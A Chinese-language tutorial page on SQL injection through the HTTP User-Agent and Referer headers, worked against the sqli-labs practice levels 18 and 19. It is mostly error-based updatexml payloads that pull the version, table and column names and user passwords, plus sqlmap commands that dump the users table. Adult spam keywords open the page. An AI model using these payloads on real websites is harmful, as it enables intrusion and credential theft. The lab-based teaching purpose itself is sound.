欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

圖文詳解HTTP頭中的SQL注入

 更新時間:2021年12月12日 09:16:52   作者:山川綠水  
HTTP頭字段是超文本傳輸協議(HTTP)中請求和響應的部分信息,它們定義了HTTP傳輸的操作參數,下面這篇文章主要給大家介紹了關于HTTP頭中SQL注入的相關資料,需要的朋友可以參考下

HTTP頭中的SQL注入

1.HTTP頭中的注入介紹

在安全意識越來越重視的情況下,很多網站都在防止漏洞的發(fā)生。例如SQL注入中,用戶提交的參數都會被代碼中的某些措施進行過濾。

過濾掉用戶直接提交的參數,但是對于HTTP頭中提交的內容很有可能就沒有進行過濾。
例如HTTP頭中的User-Agent、Referer、Cookies等。

2.HTTP User-Agent注入

就拿Sqli-Lab-Less18

這里的User-Agent是可控的,因此存在HTTP User-Agent注入

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)

Payload內容:

updatexml(xml_document,xpath_string,new_value):

第一個參數:XML文檔對象名稱。

第二個參數:XPath字符串。

第三個參數:替換查找到的符合條件的數據。

1.查看版本

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1

2.查看數據庫

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1

3.得到數據庫security,獲取數據表

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or '1'='1

4.得到數據表emails,referers,uagents,users,我們使用的是users表,獲取字段名

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),0x7e),1) or '1'='1

5.獲取字段內容

當我們使用下面的語句時,會報錯Subquery returns more than 1 ro

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users),0x7e),1) or '1'='1

返回的數據有多行,我們可以使用limit限制其只返回一條數據

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1) or '1'='1

3.HTTP Referer注入

Sqli-Lab19為例

' or '1'='1

1.查看版本

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1

2.查看數據庫

' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1

3.得到數據庫security,獲取數據表

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or '1'='1

4.得到數據表emails,referers,uagents,users,我們使用的是users表,獲取字段名

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),0x7e),1) or '1'='1

5.獲取字段內容

當我們使用下面的語句時,會報錯Subquery returns more than 1 row

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users),0x7e),1) or '1'='1

返回的數據有多行,我們可以使用limit限制其只返回一條數據

' and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e),1) or '1'='1

4.sqlmap安全測試

抓取數據包,將抓取的全部內容,放到文本文檔中,并且在有可能存在注入點的地方加入星號(*)

1.爆破數據庫

python2 sqlmap.py -r 1.txt --dbs

得到數據庫信息

2.爆破數據表

python2 sqlmap.py -r 1.txt -D security --tables

得到數據表的信息

3.爆破字段及內容

python2 sqlmap.py -r 1.txt -D security -T users --dump

得到數據內容

PS

1.HTTP User-Agent注入HTTP Referer注入屬于放包攻擊,我們在放包的過程中,必須使用正確的用戶名和密碼;

2.如果探測出是HTTP頭注入,在使用sqlmap跑的過程中,在末尾加上星號(*),可以提高滲透測試的效率

5.HTTP頭部詳解

User-Agent:使得服務器能夠識別客戶使用的操作系統(tǒng),游覽器版本等.(很多數據量大的網站中會記錄客戶使用的操作系統(tǒng)或瀏覽器版本等存入數據庫中)

Cookie:網站為了辨別用戶身份、進行 session 跟蹤而儲存在用戶本地終端上的數據(通常經過加密).

X-Forwarded-For:簡稱XFF頭,它代表客戶端,也就是HTTP的請求端真實的IP,(通常一些網站的防注入功能會記錄請求端真實IP地址并寫入數據庫or某文件[通過修改XXF頭可以實現偽造IP])

Clien-IP:同上,不做過多介紹.

Rerferer:瀏覽器向 WEB 服務器表明自己是從哪個頁面鏈接過來的.

Host:客戶端指定自己想訪問的WEB服務器的域名/IP 地址和端口號(這個我本人還沒碰到過,不過有真實存在的案例還是寫上吧).

總結

到此這篇關于HTTP頭中SQL注入的文章就介紹到這了,更多相關HTTP頭中SQL注入內容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

  • 數據庫 關系連接

    數據庫 關系連接

    數據庫 關系連接,多表查詢時需要用到的一些東西。
    2009-09-09
  • 詳解分庫分表后非分片鍵如何查詢

    詳解分庫分表后非分片鍵如何查詢

    這篇文章主要為大家介紹了分庫分表后非分片鍵如何查詢詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪
    2023-03-03
  • DBCC SHRINKDATABASEMS SQL數據庫日志壓縮方法

    DBCC SHRINKDATABASEMS SQL數據庫日志壓縮方法

    DBCC SHRINKDATABASEMS SQL數據庫日志壓縮方法...
    2007-07-07
  • Linux下Navicat15激活的詳細步驟

    Linux下Navicat15激活的詳細步驟

    這篇文章主要介紹了Linux下激活Navicat15的詳細步驟,經過測試Navicat?15.0.8版本可激活,本文給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下
    2022-08-08
  • 一款高顏值且免費的 SQL 開發(fā)工具之Beekeeper Studio詳解

    一款高顏值且免費的 SQL 開發(fā)工具之Beekeeper Studio詳解

    今天給大家推薦一款適用于Windows,Linux和Mac的跨平臺免費的開源SQL編輯器和數據庫管理應用程序 —— beekeeper-studio。對Beekeeper Studio 安裝使用教程感興趣的朋友一起看看吧
    2021-09-09
  • 數據設計之權限的實現

    數據設計之權限的實現

    這篇文章主要介紹了數據設計之權限的實現,文章圍繞主題展開詳細的內容介紹,具有一定的參考價值,需要的朋友可以參考一下
    2022-08-08
  • mssql 區(qū)分大小寫的詳細說明

    mssql 區(qū)分大小寫的詳細說明

    mssql區(qū)分大小寫,沒想到mysql也區(qū)分大小寫。相關的文章稍后奉獻給大家
    2008-03-03
  • Linux系統(tǒng)下Navicat 激活教程詳解

    Linux系統(tǒng)下Navicat 激活教程詳解

    Navicat 是香港卓軟數字科技有限公司生產的一系列 MySQL、MariaDB、MongoDB、Oracle、SQLite、PostgreSQL 及 Microsoft SQL Server 的圖形化數據庫管理及發(fā)展軟件。這篇文章主要介紹了Linux系統(tǒng)下Navicat 激活教程詳解,需要的朋友可以參考下
    2021-08-08
  • sqlserver和oracle中對datetime進行條件查詢的一點區(qū)別小結

    sqlserver和oracle中對datetime進行條件查詢的一點區(qū)別小結

    系統(tǒng)中涉及公文列表的部分,需要支持對時間列的搜索功能,但必須要同時支持sqlserver和oracle兩種數據庫,而這在這兩種數據庫中編寫查詢語句的時候有一些不大一樣的地方,無法實現一條語句實現兩個數據庫的正常查詢,所以需要做一些調整。
    2009-06-06
  • DBeaver之如何導出數據庫結構和數據

    DBeaver之如何導出數據庫結構和數據

    這篇文章主要介紹了DBeaver之如何導出數據庫結構和數據問題,具有很好的參考價值,希望對大家有所幫助。如有錯誤或未考慮完全的地方,望不吝賜教
    2023-04-04

最新評論